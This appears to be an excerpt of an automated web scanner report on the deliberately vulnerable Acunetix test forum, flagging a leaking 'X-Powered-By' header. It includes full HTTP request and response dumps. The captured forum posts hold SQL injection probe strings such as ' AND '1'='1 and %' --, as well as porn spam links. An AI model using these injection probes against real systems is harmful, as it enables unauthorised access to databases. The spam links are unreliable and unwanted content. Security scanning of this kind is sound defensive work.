<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 336 |
| Solution |
Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
|
| Reference |
http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx
http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html |
| Tags |
OWASP_2021_A01
WSTG-v42-INFO-08 OWASP_2017_A03 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10037 |
|
Low |
Server Leaks Version Information via "Server" HTTP Response Header Field |
|---|---|
| Description |
The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
